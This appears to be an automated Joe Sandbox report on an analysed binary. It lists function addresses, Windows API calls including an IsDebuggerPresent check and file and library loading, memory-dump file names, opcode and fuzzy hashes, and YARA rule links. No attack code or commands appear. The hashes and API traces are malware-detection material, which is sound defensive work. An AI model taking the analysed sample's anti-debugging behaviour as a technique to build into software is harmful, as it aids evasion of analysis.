IsThemeActive.UXTHEME ref: 00EE5FEF

Part of subcall function 00EF359C: __lock.LIBCMT ref: 00EF35A2
Part of subcall function 00EF359C: DecodePointer.KERNEL32(00000001,?,00EE6004,00F28892), ref: 00EF35AE
Part of subcall function 00EF359C: EncodePointer.KERNEL32(?,?,00EE6004,00F28892), ref: 00EF35B9

Part of subcall function 00EE5F00: SystemParametersInfoW.USER32 ref: 00EE5F18
Part of subcall function 00EE5F00: SystemParametersInfoW.USER32 ref: 00EE5F2D

Part of subcall function 00EE5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EE526C
Part of subcall function 00EE5240: IsDebuggerPresent.KERNEL32 ref: 00EE527E
Part of subcall function 00EE5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00EE52E6
Part of subcall function 00EE5240: SetCurrentDirectoryW.KERNEL32(?), ref: 00EE5366

SystemParametersInfoW.USER32 ref: 00EE602F

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 783dabc921126f8a0748b1eec55fa181c769cdf39f905a037c7fe3863a8b17d8
Instruction ID: 284b97f1718f044bbd7daaf106cebf6dfc83cb4ce8556174cbc1e5404796ba0c
Opcode Fuzzy Hash: 783dabc921126f8a0748b1eec55fa181c769cdf39f905a037c7fe3863a8b17d8
Instruction Fuzzy Hash: A011CAB18283099BC710EF69EC0594ABBF8EF99350F00491FF044A72B1DBB0A945DF92

Uniqueness

Uniqueness Score: -1.00%

Function 00EE42F9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00EE3E72,?,?,?,00000000), ref: 00EE4327
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00EE3E72,?,?,?,00000000), ref: 00F20717

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1640d152368f76b4bacde32a33ee0a2459429421833660ad7f6122fe4e444fef
Instruction ID: 9e5d5c27102cb522dc0b23e034487371ecf4108d541a08308c7ef1414f81a40d
Opcode Fuzzy Hash: 1640d152368f76b4bacde32a33ee0a2459429421833660ad7f6122fe4e444fef
Instruction Fuzzy Hash: 2C0196B014434DBEF3200E15CC8AFA67A9CEB01768F10C315FAE56A1D0C6B45C459B14

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0FE6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00EF593C: __FF_MSGBANNER.LIBCMT ref: 00EF5953
Part of subcall function 00EF593C: __NMSG_WRITE.LIBCMT ref: 00EF595A
Part of subcall function 00EF593C: RtlAllocateHeap.NTDLL(01270000,00000000,00000001,?,00000004,?,?,00EF1003,?), ref: 00EF597F

std::exception::exception.LIBCMT ref: 00EF101C
__CxxThrowException@8.LIBCMT ref: 00EF1031

Part of subcall function 00EF87CB: RaiseException.KERNEL32(?,?,?,00F8CAF8,?,?,?,?,?,00EF1036,?,00F8CAF8,?,00000001), ref: 00EF8820

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 0687d6443aef8ada6fff307986f422e22ef8836c2fdd1782fb486034b5c91975
Instruction ID: 5b4d8490f424931497d626bd9e161175e24a6279a822e870e3a66191344d9c1f
Opcode Fuzzy Hash: 0687d6443aef8ada6fff307986f422e22ef8836c2fdd1782fb486034b5c91975
Instruction Fuzzy Hash: E6F0A43560421DB6CB24BA58DD15AFE77EC9F02355F101456FA14B2292DFB18B80E6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00EF581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EF584C
__lock_file.LIBCMT ref: 00EF586D

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 0545cbcc19a79782b5049e1e6c274a1bb57ccc31a2efce0ea6ba333028e23257
Instruction ID: a6d15da2c99aad290bb9dc918b3dcf43ad7447d8c57db5f7cf225e6401a43330
Opcode Fuzzy Hash: 0545cbcc19a79782b5049e1e6c274a1bb57ccc31a2efce0ea6ba333028e23257
Instruction Fuzzy Hash: 7F018872900A4CEBCF11AF65DD018BE7BA1AF50360F145126BB247B161D7318A11DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00EF55C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00EF8D58: __getptd_noexit.LIBCMT ref: 00EF8D58

__lock_file.LIBCMT ref: 00EF560B

Part of subcall function 00EF6E3E: __lock.LIBCMT ref: 00EF6E61

__fclose_nolock.LIBCMT ref: 00EF5616

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: a9e48771c230fee207a051cdeaef8f2620766dc46bb785160570d5a32dd0059e
Instruction ID: fcb8fb7c1e1829939190ddf8a26015813a77fe7f4605b3300b01c02f4d658480
Opcode Fuzzy Hash: a9e48771c230fee207a051cdeaef8f2620766dc46bb785160570d5a32dd0059e
Instruction Fuzzy Hash: 7DF0B473A01B0D9BD7107B7589027BE77E16F61334F11A209A768BB1C1CB7C8A019F51

Uniqueness

Uniqueness Score: -1.00%

Function 00EF5E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00EF5EB4
__ftell_nolock.LIBCMT ref: 00EF5EBF

Part of subcall function 00EF8D58: __getptd_noexit.LIBCMT ref: 00EF8D58

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: 1dca8f5ecfd4387f08eb3c37998cd193f53e06e1c0892446a9b2852ff8546385
Instruction ID: 4f706dafaac650f60932556167bc5db93cce166e2e03db6e86d09f7688f6feae
Opcode Fuzzy Hash: 1dca8f5ecfd4387f08eb3c37998cd193f53e06e1c0892446a9b2852ff8546385
Instruction Fuzzy Hash: 12F0A733A11A1D9ADB00BB7489037BE76D06F21331F216346A224BB1D1CF788A019B51

Uniqueness

Uniqueness Score: -1.00%

Function 00EE124D Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,?,?,00EE3BAB,00F60980,?,00F60980,?,?), ref: 00EE1266
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,00000000,?,?,00EE3BAB,00F60980,?,00F60980,?,?), ref: 00EE1299

Part of subcall function 00EE1364: _memmove.LIBCMT ref: 00EE13A0

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: 01962d6c02e34d0caddcf96bd6f40ab281c533e67ad93e7b11ce00e1a64ab3fe
Instruction ID: 7cc6bfe16f35ba6bd45b03b8bcc61e01045108d8217e394d95fa00633f0ddf07
Opcode Fuzzy Hash: 01962d6c02e34d0caddcf96bd6f40ab281c533e67ad93e7b11ce00e1a64ab3fe
Instruction Fuzzy Hash: B501A2312051487FEB246A22DC46F7B3B9CEB85360F10806AFA05DD191DE719840D661

Uniqueness

Uniqueness Score: -1.00%

Function 00EDA820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f97a4ee9fdc1668a9b06a1c2c506bbeb0f745b1d31c089807fd172dc4abbbe
Instruction ID: 8b3182b5bc9bd68cd1e5ec20bea540e72d446044a6b0e96a92c753a1d68bb58e
Opcode Fuzzy Hash: e1f97a4ee9fdc1668a9b06a1c2c506bbeb0f745b1d31c089807fd172dc4abbbe
Instruction Fuzzy Hash: 2D61EC70600206DFCB10DF60D891ABAB7F5EF44310F19806AE916AB391D775EE82DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EDD679 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 929de7da0d9574f754836503d26eaf91fb8cd3b21bc8175c6718921cd6b2e6b8
Instruction ID: 7a6fca2f1bf6503311c74676050adace5280311f1cd1227dd4e7e50604b3982e
Opcode Fuzzy Hash: 929de7da0d9574f754836503d26eaf91fb8cd3b21bc8175c6718921cd6b2e6b8
Instruction Fuzzy Hash: F651A131704608AFCB14EB64CD95EAE77E6AF85720F145099F816BB392CB30ED41DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00EE410A Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00EE41B2

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 887160e5f9dbd868af8de916388054410da8424dd755e0408a1a62eaabf50da3
Instruction ID: 14e91e5db6fa6980fd07b5d86d1f4e1bdc8b2570c66ebd40a098d5c3d8266f4a
Opcode Fuzzy Hash: 887160e5f9dbd868af8de916388054410da8424dd755e0408a1a62eaabf50da3
Instruction Fuzzy Hash: 3231A3B1A01699AFCF18CF2DC880A9DB7B1FF58314F159619E815A3750D770BD90CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EE3FCE Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EE4016

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 86cd0f51659f3abb66fa2dff679f130fc63467a4e84c12e628a3a08821a99e8b
Instruction ID: f49d5bcec07d5ae0b2a95b4dbe9e8db2d93541fc654f91c056ccb50c0bb7689a
Opcode Fuzzy Hash: 86cd0f51659f3abb66fa2dff679f130fc63467a4e84c12e628a3a08821a99e8b
Instruction Fuzzy Hash: A7210272A0471CEBCB149F61F884BBA7FB8FB50350F2184AAE485E2551EF3189E0E755

Uniqueness

Uniqueness Score: -1.00%

Function 00EE49C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE4B29: FreeLibrary.KERNEL32(00000000,?), ref: 00EE4B63

Part of subcall function 00EF547B: __wfsopen.LIBCMT ref: 00EF5486

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,00EE27AF,?,00000001), ref: 00EE49F4

Part of subcall function 00EE4ADE: FreeLibrary.KERNEL32(00000000), ref: 00EE4B18

Part of subcall function 00EE48B0: _memmove.LIBCMT ref: 00EE48FA

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 87fdc68f12ea539cdee1eda91fd1cbf2ef8be042cc052fe1326d24b29bf7a16d
Instruction ID: 10ea08f9c163595949348bd33d84d6ba4168721beb8566468aa65bf0fea759b5
Opcode Fuzzy Hash: 87fdc68f12ea539cdee1eda91fd1cbf2ef8be042cc052fe1326d24b29bf7a16d
Instruction Fuzzy Hash: 2C11C47265024DABCB14FB71DC16EAE76E99F40721F104429F549B62C2FF709A10AB98

Uniqueness

Uniqueness Score: -1.00%

Function 00EE1BCC Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EE1BFE

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8743ca98b94d490d4eeea8aa4a770679c4eb770aae92df06800fd72145327ee2
Instruction ID: 1c50a610e066fbe8312a2b81f9a104ba9d091866a30486517d2e2241ad7ec294
Opcode Fuzzy Hash: 8743ca98b94d490d4eeea8aa4a770679c4eb770aae92df06800fd72145327ee2
Instruction Fuzzy Hash: 2F114C76204609DFC724CF29D481966F7E9FF49354720986EE58ADB261E732E881CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EE1364 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EE13A0

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: bc3ff6b20b4e08c660cfcd2e986713c9488f0a20d7626c26cf04ced9957a9e7a
Instruction ID: 1e964d90158ba74dc3c0f92b3128eee03c8ed9581bf1c1a9286c1c3748d8ba94
Opcode Fuzzy Hash: bc3ff6b20b4e08c660cfcd2e986713c9488f0a20d7626c26cf04ced9957a9e7a
Instruction Fuzzy Hash: 2511257220834DABC7149F6DD881D7EB3D8EF85360B20526AFD19E7291EB319C508790

Uniqueness

Uniqueness Score: -1.00%

Function 00EE4220 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00EE3CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00EE4276

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f8e9090d76e1b39c9a17c0af3a6ac086a2817a6816c5ad7423d45673a4834345
Instruction ID: 10cf39853815d62d412616ab35227b0943b57da3f6670336a0591e54507d86c7
Opcode Fuzzy Hash: f8e9090d76e1b39c9a17c0af3a6ac086a2817a6816c5ad7423d45673a4834345
Instruction Fuzzy Hash: B1114FB1200B459FD730CF56D480B62B7F5EF88714F10D91DEAAA966A0D7B0F845DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EE408F Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F206BC

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 0a78885edf71d424e7563c00fb0e003dde73f860971e72194576d82374af60c9
Instruction ID: 340ed370b895aba726cfca7bf0896d4be2a20f3ecc07fe125a5f1f4b9ef04ed4
Opcode Fuzzy Hash: 0a78885edf71d424e7563c00fb0e003dde73f860971e72194576d82374af60c9
Instruction Fuzzy Hash: 00017CB570054AABC305DB29C451D2AF7E9FF8A3503149169F919C7742DB31AC21CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EE3EBE Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 00EE3EF6

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _wcscpy
String ID:
API String ID: 3048848545-0
Opcode ID: 723712a67ac4c7bb138e4dcb30ed5178b0b7e88fe59e113297e06dfd62ddb98d
Instruction ID: 07478dedf0e7ea2ce7483735e46fbb0d4c6dabb09728fbc7db9b214ff1976139
Opcode Fuzzy Hash: 723712a67ac4c7bb138e4dcb30ed5178b0b7e88fe59e113297e06dfd62ddb98d
Instruction Fuzzy Hash: 10E0EC3231C354265915262A9C828BAB3DDDF85330310126BF501B72D2DE5329465165

Uniqueness

Uniqueness Score: -1.00%

Function 00EE4A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00EE4AA4

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction ID: 1d3e5a943ded4b5fdc9a6c50b3f74e9a605b2f0307644b8dec198f92e2a56fb1
Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction Fuzzy Hash: 1AF08CB6400208BFDF108F45DC00CEB7BB9EB85320F004198F9045A211D232EA219BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EE4A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00EE27AF,?,00000001), ref: 00EE4A63

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
